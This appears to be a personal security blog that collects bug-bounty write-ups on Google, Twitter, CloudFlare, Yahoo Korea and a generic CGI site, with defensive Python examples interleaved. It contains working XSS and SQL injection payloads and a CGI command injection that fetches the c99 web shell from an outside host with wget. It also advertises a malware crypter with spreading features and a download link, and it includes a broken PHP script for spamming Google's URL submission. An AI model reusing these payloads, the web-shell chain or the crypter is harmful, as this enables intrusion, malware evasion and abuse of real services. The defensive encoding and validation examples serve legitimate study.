I forgot to blog about another of my Google bugs. Nowadays I am busy with my start-up project! I hope to be back on bug bounty soon and will have some good blog posts out!
Changing the OAuth Target URL & Domain Description can be achieved using a clickjacking vulnerability. Clickjacking is commonly known as an OWASP Top 10 vulnerability.
Status: Fixed
OAuth is cool and simple to understand; developers can integrate with Google's OAuth endpoints seamlessly and effortlessly. Google provides a panel to manage the Return URL & Domain Description at the following URL.
Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com
On the page there are two input boxes, Target URL path prefix: and Domain description:, where the user submits the domain and description information.
As shown in the following image:
Change OAuth Domain & Description
POC: <iframe src="https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com" width="600" height="600"></iframe> // Not actual POC
Header Information:
As you can see, the header that would prevent framing is missing from the headers shown below.
Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
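The write-up's point is that the page was served without any header that stops it from being framed. As an added example (not code from the original post or from Google), the check below classifies a set of response headers the way a triager would; the sample header sets are constructed for this example and are not the page's own capture:

```python
# Added example: classify a response's anti-framing headers as 'blocked', 'weak'
# or 'missing'. Header names are matched case-insensitively. A CSP frame-ancestors
# directive takes precedence over X-Frame-Options, since browsers that support
# CSP ignore X-Frame-Options when both are present.

def framing_protection(headers):
    lowered = {k.lower(): v for k, v in headers.items()}

    csp = lowered.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            # 'none', 'self' or an explicit origin list restricts framing;
            # a bare '*' lets any site frame the page, which is no protection.
            return "missing" if "*" in sources else "blocked"

    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "blocked"
    if xfo.startswith("ALLOW-FROM"):
        # Obsolete and ignored by most browsers: treat as weak protection only.
        return "weak"
    return "missing"

# Constructed sample: the vulnerable state described above, no anti-framing header.
VULNERABLE_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
    "Cache-Control": "no-cache, no-store",
}

# Constructed sample: a hardened response carrying both headers.
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}

if __name__ == "__main__":
    for name, hdrs in (("vulnerable", VULNERABLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{name}: framing protection {framing_protection(hdrs)}")
```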
Special thanks to the Google Security Team & the G4H (garage4hackers.com) team.
Thank you Twitter, and especially BOB from Twitter, who was always in touch to resolve the Twitter vulnerability I reported.
Thank you Twitter for starting this kind of program to encourage information security researchers.
Here is the link:
https://twitter.com/about/security
PIC :
————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple HTML Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep Kamble
0x4 Reported: December 28, 2011
0x5 Vulnerability Fix date: Jan 05, 2012
0x6 Public Release: Jan 05, 2012
0x7 Browser: Firefox, IE
0x8 OS: Win7, Ubuntu
——————————————————————–
Description of script:
Twitter provides features to protect user privacy: using the account settings you can protect your Tweets, change your username, change your password, and change your e-mail address.
Affected script URL:
URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name
Vulnerability Description:
1) Cross Site Scripting Vulnerability (Twitter mobile is affected by client-side XSS; it was protected against clickjacking):
Cross-site scripting is a type of injection in which malicious JavaScript is injected into a web site's dynamic pages.
2) HTML Injection Vulnerability (Twitter mobile is affected on the client side; one HTML injection was stored)
HTML injection is a type of injection in which malicious HTML code is injected into a web site's pages.
Exploit Description + Proof of Concept:
URL #1: https://mobile.twitter.com/settings/name
Title #1: Stored HTML Injection Vulnerability
In the above URL there is one input box to change the name. The HTML code of the input box is as follows.
Twitter allows only 20 characters in the name field.
If we try executing malicious HTML code, the HTML code looks as follows:
HTML Code: ">sandeep
The malicious HTML code executed successfully within the input box's syntax. The following shows the output of the above input-box code execution.
URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability
In the above URL there is one input box to change the user name. The HTML code of the input box is as follows.
In the input box we can execute JavaScript as well as HTML code, so it is vulnerable to cross-site scripting and HTML code injection.
JS: "><script>alert(document.domain)</script>
The malicious JS code executed successfully within the input box's syntax. The following shows the output of the above input-box code execution.
Similarly we can execute HTML code, but it is not stored HTML code execution.
Check out the video here:
http://dl.dropbox.com/u/18007092/twitter.swf
Countermeasure
1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization
Warm Regards,
Sandeep Kamble
www.sandeepkamble.com
0x1 Site: http://anti-virus.cloudflare.com
0x3 Author: Sandeep Kamble
0x4 Reported: October 12, 2011
0x6 Public Release: October 17, 2011
0x7 Status: Fixed
Description :
Anti-virus.cloudflare.com is a service for avoiding spam.
This project stops attacks and educates visitors with infected computers about how they can clean up their machines.
Affected Variable :
?b_src=
Exploit :
Executing JavaScript using the vulnerable variable ?b_src=. This attack is commonly known as Cross Site Scripting (XSS).
The affected anti-virus.cloudflare.com script has a stored XSS which can be used for grabbing cookies.
POC :
Screen Shot :
Cloud XSS
1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization
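Both the Twitter write-up (a stored name breaking out of a value="..." attribute with ">) and the CloudFlare write-up (a ?b_src= parameter reflected into the page) end with the same countermeasure. As an added example, not code from either post or either company, this renders the two contexts with contextual output encoding; the payloads are the ones quoted above, the markup around them and the NAME_MAX_LEN constant (taken from the 20-character limit the post mentions) are constructed for this example:

```python
# Added example: contextual output encoding for the two injection points above.
import html

NAME_MAX_LEN = 20   # the length limit the Twitter mobile name field enforced (from the post)

def render_name_input(name):
    """Attribute context: the stored name is placed inside value="...".

    html.escape(quote=True) turns the quote in a '">' breakout into &quot;, so the
    value stays inside the attribute instead of opening new markup. The length limit
    is applied to the raw value, before encoding, so truncation never cuts an entity
    in half (which could otherwise leave a dangling '&' in the output).
    """
    safe = html.escape(name[:NAME_MAX_LEN], quote=True)
    return f'<input type="text" name="name" value="{safe}">'

def render_b_src_message(b_src):
    """Text context: a reflected query parameter echoed into the page body.

    Here '<' and '>' are what matter; once escaped, a <script> tag is displayed
    as text rather than parsed as an element.
    """
    return f"<p>Blocked source: {html.escape(b_src)}</p>"

if __name__ == "__main__":
    stored_payload = '">sandeep'                                  # HTML injection from the post
    xss_payload = '"><script>alert(document.domain)</script>'    # XSS from the post
    print(render_name_input(stored_payload))
    print(render_name_input(xss_payload))
    print(render_b_src_message("<script>alert(1)</script>"))
```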
Conclusion
I would like to thank the CloudFlare Security Team for their quick responses to my reports.
Author: Sandeep Kamble
Released Date: September 9, 2010
Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept information passed from the client as a replacement for the specified target.
Vulnerabilities:-
1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.
Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995
Exploit:-
The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag "Input". Each "Input" tag has a variable name associated with it. This is the variable name that forms the left-hand side of the previously mentioned variable=value token. The contents of the variable form the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the "Input" field. However, if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the "Input" data will pass the data directly to the interpreter.
Example:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|
Shell upload command:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|
Shell:-
http://www.victem.com/newswire/uploadedimage.php
Conclusion:-
The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.
After the shell upload you can try for more. I hope you find it useful; be safe!
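The post's exploit works because the `article` value reaches the interpreter unvalidated, so a `|` in it becomes a command. As an added example (not the post's code, and not the code of any real newsaction.cgi), the validation step below accepts only the one shape the post's URLs show for an article id (digits, a dot, digits; that format is an assumption taken from those URLs) and rejects the injected values before they can reach a file open or a shell:

```python
# Added example: strict allow-list validation of the CGI 'article' parameter.
import re
from pathlib import Path

# Assumed id format, taken from the post's URLs: <digits>.<digits>, nothing else.
ARTICLE_ID = re.compile(r"\A\d{1,20}\.\d{1,20}\Z")

def is_valid_article_id(raw):
    # \A and \Z (rather than ^ and $) mean a trailing newline cannot slip past,
    # and fullmatch requires the whole value to match, so "...|pwd|" fails.
    return isinstance(raw, str) and ARTICLE_ID.fullmatch(raw) is not None

def validate_article_id(raw):
    """Return the id unchanged if well-formed, else raise ValueError."""
    if not is_valid_article_id(raw):
        raise ValueError("article id must look like <digits>.<digits>")
    return raw

def article_path(base_dir, raw):
    """Map a validated id to a file under base_dir.

    Because the id is already limited to digits and one dot, it cannot contain
    '/', '..', '|' or any shell metacharacter, so the joined path stays inside
    base_dir. The resolve() check is defence in depth, not the primary control.
    """
    base = Path(base_dir).resolve()
    target = (base / (validate_article_id(raw) + ".txt")).resolve()
    if base not in target.parents:
        raise ValueError("article path escaped the news directory")
    return target

if __name__ == "__main__":
    # First value is the legitimate id from the post; the others are injection attempts.
    for value in ("999999998473.992039800995",
                  "999999998473.992039800995|pwd|",
                  "999999998473.992039800995|wget http://example.invalid/x;ls -la|"):
        try:
            print("accepted:", article_path("/var/www/newswire", value))
        except ValueError as exc:
            print("rejected:", repr(value), "->", exc)
```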
This is Crypter with Universal Stub Generator 1.3; the USG is written in VB.net.
It has spread options: P2P, USB & Startup.
File clone, icon and file info, and then the other PE options you see listed, like add section, strip relocations, change entry point, etc.
Make Your Stuff FUD
http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar
This captcha bypass allows a spammer to submit a large number of websites (maybe more than 1000) to the Google crawler by writing a simple program in any programming language.
Original link (with captcha): www.google.com/addurl/?continue=/addurl
Bypass captcha link POC: http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=
If you execute the above URL in the browser, it will add the new website to the Google crawl database. The following program can be used to submit a large number of websites at a time.
PHP Code:
<?php
@if(isset($_POST)){
  $part1 = "http://www.google.com/addurl?q=";
  $part2 = "&hl=&dqq=";
  $curl = curl_init("http://google.com");
  curl_exec($curl);
  $urls=$_POST["urls"];
  $lines=explode("\n",$urls);
  foreach($lines as $line) {
    $new = str_replace(" ", "", $part1.$line.$part2);
    curl_setopt($curl,CURLOPT_URL,$new);
  }
}
echo "done.";
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form>
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>
</body>
</html>
This may be a small vulnerability, but still we want Google to be the most secure! So please try to fix it. Otherwise there will be no use for the captcha. Now Google has patched this vuln :) /peace Sandeep k.
Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed
Overview:
Yahoo Korea has Blog-shop, which is one of the most famous subdomains in Korea.
A cross-site scripting (XSS) vulnerability affects blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.
Exploit Description :
It has SQL injection in the notice_read.html?key script. I was successful in retrieving Yahoo users' cookies from this SQL injection by inserting JavaScript into the SQL injection payload.
POC (Proof Of Concept ):
http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20
Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)
Regards
Sandeep Kamble
This is my personal blog; I am going to share my personal things related to IT security. I am going to share all my experiences related to information technology.
Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, Shaista mam & my team and my friends Kishor, Lalit, Jitu, Mug.
My Gmail : sandeepk.l337@gmail.com